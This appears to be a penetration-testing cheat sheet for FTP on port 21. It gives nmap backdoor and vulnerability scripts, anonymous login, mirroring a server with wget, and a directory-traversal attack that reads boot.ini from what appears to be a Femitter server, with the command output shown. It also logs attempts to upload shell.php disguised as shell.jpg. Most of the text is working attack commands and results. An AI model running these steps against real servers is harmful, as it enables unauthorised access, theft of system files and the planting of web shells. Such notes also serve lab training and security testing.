FTP - 21
NMAP FTP
ls /usr/share/nmap/scripts/ | grep FTP
nmap --script ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 192.168.63.93Anonymous Login
ftp $IP
username: anonymousDownload all files in a directory
mget *Download all files from FTP
wget -m ftp://anonymous:anonymous@10.10.10.98 #Donwload all
wget -m --no-passive ftp://anonymous:anonymous@10.10.10.98 #Download allFile Traversal attack here
ftp> dir ../
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Sep 23 2015 .
drw-rw-rw- 1 ftp ftp 0 Sep 23 2015 ..
-rw-rw-rw- 1 ftp ftp 48 Nov 01 2010 buy.url
drw-rw-rw- 1 ftp ftp 0 Sep 23 2015 Configs
-rwxrwxrwx 1 ftp ftp 1095168 Nov 01 2010 fem.exe
-rw-rw-rw- 1 ftp ftp 2145 Sep 23 2015 INSTALL.LOG
drw-rw-rw- 1 ftp ftp 0 Sep 23 2015 Logs
-rw-rw-rw- 1 ftp ftp 59904 Nov 01 2010 manual.chm
drw-rw-rw- 1 ftp ftp 0 Sep 23 2015 Shared
-rwxrwxrwx 1 ftp ftp 148992 Feb 22 1999 UNWISE.EXE
226 File sent okFtp upload attempts with put and send
put shell.php shell.jpg
local: shell.php remote: shell.jpg
200 Port command successful.
501 Permission Denied
ftp> send
(local-file) shell.php
(remote-file) shell.jpg
local: shell.php remote: shell.jpg
200 Port command successful.
501 Permission DeniedFile Download attempts
ftp> GET ../../../boot.ini
?Invalid command
ftp> get ../../../boot.ini
local: ../../../boot.ini remote: ../../../boot.ini
200 Port command successful.
150 Opening data connection for ../../../boot.ini.
226 File sent ok
211 bytes received in 0.00 secs (333.4218 kB/s)
ftp> mget ../../../boot.ini
Filename provided by server doesn't match pattern `../../../boot.ini': /C:/Program Files/Femitter/Shared/../../../boot.ini not found
Refusing to handle insecure file listLast updated
Was this helpful?